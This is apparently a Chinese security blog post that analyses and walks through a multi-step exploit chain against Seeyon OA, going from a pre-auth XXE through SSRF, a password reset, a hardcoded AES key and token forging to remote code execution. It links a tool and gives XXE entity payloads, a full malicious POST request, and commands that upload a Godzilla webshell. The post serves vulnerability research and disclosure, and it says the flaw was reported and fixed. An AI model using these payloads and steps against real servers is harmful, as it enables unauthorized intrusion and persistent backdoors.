百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术文章 > 正文

【新】致远OA从前台XXE到RCE漏洞分析

cac55 2025-03-06 12:25 12 浏览 0 评论

0x01 前言

致远OA是目前国内最流行的OA系统之一,前几年也曾爆出过多个安全漏洞。致远官方一直对修复漏洞的态度十分积极,目前能有效利用的致远漏洞已经很少了。

和我们之前分享过的通达OA的漏洞类似,这类主流OA系统现在想要直接一步达到RCE的效果是非常困难的。今天跟大家分享一个通过组合漏洞方式来对致远OA进行RCE的案例,整个利用过程分成多个步骤,应该算是XXE漏洞的典型深入应用场景。

在今年8月的某攻防演练活动中笔者利用此漏洞拿到多个目标的边界权限,后续也将该漏洞也报送给了官方,目前已在新版本中修复。本文仅以安全研究为目的,分享对该漏洞的挖掘和分析过程,文中涉及的所有漏洞均已报送给国家单位,请勿用做非法用途。


0x02 XXE漏洞

致远OA多个版本(A8, A8+, A6)中均存在一个XXE漏洞,在com.kg.web.action.RunSignatureAction类中接收外部输入的参数xmlValue。

info.setTextinfo(textinfo);
String xml = ctx.getParameter("xmlValue", new String[0]);
String signature = null;
if (this.jsNotNull(xml)) {
    signature = exec.runSignature(info, xml);
} else {
    String protectedData = this.getProtectedData(ctx);
    signature = exec.runSignature(info, this.getProtectedDataList(protectedData));
}

如果不为空,则进入runSignature方法。

public String runSignature(KgSignatureInfo info, String protectedXml) {
    List data = this.xmlToList(protectedXml);
    this.put(KgSignName.FIELDXML, protectedXml);
    return this.runSignature(info, data);
}

继续跟踪进入xmlToList方法。

public List xmlToList(String protectedXml) throws KgException {
    ArrayList protectedDatas = new ArrayList();


    try {
        List s = this.getNodes(protectedXml, "/Signature/Field");

继续跟踪,进入getNodes方法,这里就是很明显的XXE漏洞位置。

private List getNodes(String xmlString, String xpath) {
    ArrayList tmpList = null;


    try {
        SAXReader saxReader = new SAXReader();
        Reader xml_sr = new StringReader(xmlString);
        saxReader.setEncoding("UTF-8");
        Document document = saxReader.read(xml_sr);
        if (document.getRootElement() == null) {
            throw new KgException(new KgCommonsError("XmlParser Object hasn't RootElement.", KgCommonsError.SYSTEM_ERROR.getCode()));
        } else {
            List contexts = document.selectNodes(xpath);
            tmpList = new ArrayList();


            for(int i = 0; i < contexts.size(); ++i) {
                if (contexts.get(i) instanceof Element) {
                    tmpList.add((Element)contexts.get(i));
                }
            }


            return tmpList;
        }
    }


完整的payload如下,发送下面的请求,触发XXE的SSRF功能。相应内容如下代表存在漏洞。如图2.1所示

图2.1 存在SSRF漏洞的页面响应

图2.2 利用XXE产生SSRF请求


0x03 RCE漏洞


在java环境下是不能直接通过XXE来执行系统命令的,并且这里的XXE是不具有回显的功能,仅能通过XXE来达到SSRF的效果,并且只能进行GET类型的请求。如何通过SSRF来达到RCE的效果是充分利用此漏洞的关键。


本人在分析致远的系统服务的过程中发现致远在某些情况下会开放60001端口,一般是监听在本地地址127.0.0.1的。服务是由一个名为agent.jar的包提供的服务,如图3.1所示。

图3.1 agent.jar开放的60001端口服务



com.seeyon.agent.sfu.server.apps.configuration.controller.ConfigurationController类中定义了方法testDBConnect,如图3.2所示。

图3.2 testDBConnection方法定义


继续跟踪this.configurationManager.testDBConnect方法,如图3.3所示。这个方法的主要作用是用于测试数据库连接,并且允许自定义连接驱动类。

图3.3 允许自定义driverClass


在文章
https://paper.seebug.org/1832/中详细介绍了基于JDBC Connection URL的利用方法,其中最简单的是使用通过h2数据库来达到RCE效果,如图3.4所示。对原理感兴趣的小伙伴可以参考原文。

图3.4 通过H2数据库达到RCE效果


到这一步已经可以看出整个命令执行的大致逻辑是通过XXE来执行SSRF请求,通过SSRF访问致远60001端口中的testDBConnection方法,并且传递恶意的driverClass和dbUrl来达到RCE的效果。


然而现实情况下确远没有这么简单,直接访问上面的testDBConnection,会报“非法访问的错误”,如图3.5所示。

图3.5 直接访问testDBConnection报错


根据错误提示反向找到对应的逻辑代码
com.seeyon.agent.common.interceptor. SecurityInterceptor的preHandle方法,这应该是全局的拦截器,其中关键的代码如图3.6所示。

图3.6 根据错误提示反响找到验证代码逻辑


从这段代码中可以清晰的看出需要传入参数ad,并且有对ad参数进行有效校验的方法isChecktoken,跟踪isChecktoken方法。

图3.7 isChecktoken方法逻辑判断


isChecktoken方法很简单,其中tokenMap是静态属性,默认为空。需要找到为tokenMap赋值的办法。在这个逻辑卡了很久,很长一段时间都以为没办法利用,后来找到了一个可以为tokenMap写入数据的办法
com.seeyon.agent.common.getway.getToken方法,如图3.8,图3.9所示。

图3.8 通过传入的seeyon参数进行AES解密获取字段

图3.9 生成token并响应token结果


跟踪生成token的TokenUtils.getToken方法,如图3.10所示。这里会生成一个随机的token名称,并保存到tokenMap的静态属性中,与图3.7需要的逻辑判断相呼应。

图3.10 生成token并保存到静态属性tokenMap中


但是这里还有两个问题需要处理,一个是图3.8中AES加密的密钥是多少,另一个是传入的参数signature如何进行签名验证。第一个问题需要跟踪AESUtil.Decrypt方法,如图3.11所示,密钥和偏移量iv都为0102030405060708,典型的硬编码问题。第二个问题是签名校验时只是把传入的参数进行sha1计算,然后比较值,如图3.12所示。

图3.11 通过硬编码实现的AES解密

图3.12 通过sha1签名进行校验


到这一步还是不能没有完全解决我们的问题,因为我们在图3.8说了需要传入的参数包括username、pwd和versions这些参数。那么这些参数是怎么来的呢?

1)username参数可以传默认存在的用户名seeyon

2)pwd参数我没有找到默认的值,但是找到了一个任意用户密码重置的接口(这里的用户并不是致远前台WEB的用户,而是60001接口对应的用户)。在
com.seeyon.agent.common.controller.ConfigController类的modifyDefaultUserInfo方法中提供了重置用户密码的接口,并且不需要认证,如图3.13所示。

图3.13 通过modifyDefaultUserInfo方法来充值seeyon用户密码


3)versions参数也没有默认值,versions参数来源于当前目标系统版本,实际环境中可能存在多种不同的值2.1.0,2.3.4等都有可能。可以通过接口com.seeyon.agent.common.controller.VersionController类的getVersion方法获取,如图3.14所示。

图3.14 通过getVersion方法获取当前目标致远版本号


到目前为止就分析了完整的漏洞利用过程,整个过程分成多个步骤,漏洞利用过程比较复杂。


0x04 漏洞利用


漏洞分析过程已经在上面的文章中体现了,整个流程还是非常复杂的,感兴趣的同学可以自己去复现。另外我把整个漏洞利用过程写成了一个简单的工具,并整理为下面的步骤。下载的工具解压之后如图4.1所示。


工具下载链接:

https://www.ddpoc.com/poc/DVB-2023-5278.html


图4.1 致远XXE综合利用工具


> Step1:

把124.xml、125.xml和126.xml上传到自己的vps上,并开启WEB访问。

> Step2:

修改124.xml文件中第二个请求的地址为自己的vps地址,如下所示。

<!ENTITY % file SYSTEM "http://127.0.0.1:60001/agent/config/modifyDefaultUserInfo?pwd=TVRJek5EVTI=">
<!ENTITY % int "">

> Step3:

生成重置密码的POC,使用下面的命令,保证124.xml能正常访问到。

java -cp seeyon.jar Main reset http://yourvps:yourport/124.xml


图4.2 生成重置密码POC


通过获取的payload,修改xmlValue字段的值。后续请求会多次利用下面的请求发起SSRF行为,后续简称SSRF请求。

POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet?S=ajaxEdocSummaryManager&M=deleteUpdateObj HTTP/1.1
Host: target.host
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 302

signatures=YWFh02JiYitY2M%3D&encode=true&elemId=YWFh&imgvalue=MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDVNVEl=&xmlValue={payload}


正常来说VPS部分会收到下面的请求,如图4.3所示。如果收到124.xml的请求代表目标存在XXE漏洞;如果收到123.php的请求代表可以对目标进行RCE。

图4.3 重置密码的服务端请求


> Step4:

修改125.xml文件中第二个请求的地址为自己的vps地址,如下所示。

 file SYSTEM "http://127.0.0.1:60001/agent/version/getVersion">
 int "">


> Step5:

生成获取系统版本的POC,使用下面的命令,保证125.xml能正常访问到。

java -cp seeyon.jar Main version http://yourvps:yourport/125.xml


图4.4 生成获取系统版本POC


修改SSRF请求中的payload为生成的POC,发送请求,可以在服务器端查看获取到的版本信息,如图4.5所示。

图4.5 通过界面响应获取版本信息


> Step6:

生成获取param需要的POC,使用下面的命令,其中最后的版本替换为上一步获取的版本,如图4.6所示。

java -cp seeyon.jar Main param 2.0.8


图4.6 生成获取token需要的参数seeyon和signature


> Step7:

修改126.xml文件中的内容,替换为自己地址,需要注意的是这里必须替换参数seeyon和signature中的值为上一步生成的值,如图4.7所示。

图4.7 修改126.xml文件中内容


> Step8:

生成获取token需要的POC,使用下面的命令,如图4.8所示。

java -cp seeyon.jar Main token http://yourvps:yourport/126.xml


图4.8 生成获取token需要的POC


修改SSRF请求中的payload为生成的POC,发送请求,可以在服务器端查看获取到的版本信息,如图4.9所示。

图4.9 获取token


> Step9:

生成最终利用的POC和EXP,使用下面的命令。其中token需要替换为上一步获取的token。

java -cp seeyon.jar Main rce 26926456886553:7RU5MTY4OTc1NDg1NjI4OA==4AA test #探测漏洞 java -cp seeyon.jar Main rce 26926456886553:7RU5MTY4OTc1NDg1NjI4OA==4AA gsl #生成哥斯拉webshell


工具提供两种方式test和gsl,其中test在目标服务器上生成一个seeyon.txt的文件,对应的访问方式为
http://www.target.com/seeyon.txt,仅用于测试目的;gsl在目标服务器上传哥斯拉webshell,对应的访问访问为
http://www.target.com/logon.jsp 111/111。

图4.10 生成用于测试用的test POC


修改SSRF请求中的payload为生成的POC,发送请求。查看目标服务器的

seeyon.txt文件,如图4.11所示。

图4.11 验证漏洞利用是否成功


0x05 结论


由于这个漏洞已经在手里太长时间了,很多分析是一年以前写的,写这篇文章的时候并没有完整的跟踪整个漏洞,其中细节难免有疏忽,如有不对的地方欢迎大家给我们留言。结合上面的分析可以看出致远OA能RCE的前提条件包括:


1、目标服务器出网

2、目标致远开启了60001端口


第一个条件是很容易满足的,因为现在致远的服务器需要在线更新,所以基本上都是出网的;第二个条件不一定满足,从实网测绘数据来看约有1/3的致远OA是开启了这个端口的。


本文仅以提供技术交流为目的,所有漏洞均已上报相关单位,请勿将本文工具用于非法网络攻击目的。

相关推荐

三菱PLC新手必备!20个案例带你打通编程逻辑!!!

在当今自动化蓬勃发展的时代,三菱PLC已然成为众多自动化爱好者和从业者踏入控制领域的首选利器。无论是小型的自动化生产线,还是智能家居系统的搭建,三菱PLC都发挥着举足轻重的作用。在接下来的内容...

一文教你看懂三菱PLC定位指令应用

一动作描述1、分别介绍各个定位指令的使用规则;2、使用定位指令控制伺服步进,(以脉冲加方向的方式);3、M8029应用注意事项。二硬件设备1、三菱PLC:FX3U-32MT;2、步进电机和步进驱...

电气人,三菱Q系列和FX PLC系列之间的区别你都知道吗?

PLC软元件大比拼,Q系列VSFX系列,你的选择是什么?家,对每个人都很重要;爱,也是。对工程师来说,PLC就像他们的家,用代码搭建的爱。今天,咱们说说三菱PLC里的Q系列和FX系列,看看它们软元件...

三菱PLC中定位指令DRVA的使用案例

三菱PLC绝对定位指令DRVA使用案例深度解析:从入门到进阶一、案例引入:伺服电机绝对定位控制用户需求:工厂自动化生产线需要对工件进行精准定位,误差必须控制在极小的范围内。这要求伺服电机能够在特定位...

三菱FX-PLC设计一个通电和断电均延时的梯形图

任务描述设计一个通电和断电均延时的梯形图。当X000由断变通时,延时10S后Y0得电;当X000由通变断时,延时5S后Y000断电。程序#电工交流圈##PLC##三菱PLC##梯形图#...

三菱R系列PLC硬件组态案例2(三菱plc硬件结构图)

概述本例中将详细介绍模拟量输出模块R60DAV8的使用方法硬件组态设置CPU:R04ENCPU(内置RJ71EN71集成一个以太网口和CC-LinkIEField接口)电源:R62P串行模块:RJ...

新手必看:三菱FX PLC输入接线(三菱fx plc教学视频)

导读:对于学习三菱PLC编程的初学者,熟悉和掌握PLC输入接线是必须的。PLC输入接线,根据输入端可以接的元件大致可以分为两线制和三线制。通过下文学习三菱FXPLC的输入接线。一个基本回路需要哪三个...

这几种方法教你三菱PLC如何控制变频器,对比,哪种最适用

变频器是一个执行机构,它的作用就是驱动三相异步电动机,一些高性能的变频器也可以驱动同步电机,甚至增加编码器反馈实现伺服功能。至于如何驱动,就靠PLC控制实现。在工控行业中,PLC与变频器是最常见的一种...

三菱PLC编程实例(三菱plc编程实例大全)

三菱PLC编程实例-正反转电路PLC控制控制要求:通过PLC程序控制实现三相异步电动机的正反转控制(正反转切换不需要进行停止可直接切换),且设备具有过载保护、短路保护。注:切换方向时,正运行方向立即...

三菱plc的数据类型(PLC的基础)(三菱plc常用的型号)

三菱PLC的数据类型根据其软元件和用途可分为以下几类:1.位(Bit)用途:表示开关状态(ON/OFF)。软元件:`X`(输入继电器)、`Y`(输出继电器)、`M`(内部继电器)、`S`(步进继电...

三菱R系PLC高级应用(三菱plc高级编程实例)

三菱R系PLC高级应用一、模块配置1.添加模块打开GXWorks3,新建工程,选择PLC型号。添加CPU,系统提示设置模块。模块标签,用于在程序中使用标签对模块的参数设置和模块的状态读取。样本注...

三菱PLC报警一览表(部分)(三菱plc报警代码手册)

...

三菱PLC特殊功能辅助继电器-分类总结清单

1.FX系列PLC2.Q系列PLC3.A系列PLC关注我,学习更多电气知识!...

[三菱PLC] 三菱FX各系列轴输出和插补说明

三菱FX系列PLC当下常用的有FX3SA、FX3GA、FX3U、FX5U(IQ-F)。这几个系列里对应晶体管型号的主机具备轴定位功能。之前呢,FX3SA、FX3GA、FX3U只能让单轴单独...

三菱PLC的几种类型(常用的三菱plc)

三菱PLC分几种类型,其中这几种要记住三菱PLC分几种类型,今天分享大家分享三菱PLC分几种类型。一、PLC的类型:1、小型PLC一体式结构、I/O点数:256点(384点)多用于单机控制如:FX1...

取消回复欢迎 发表评论: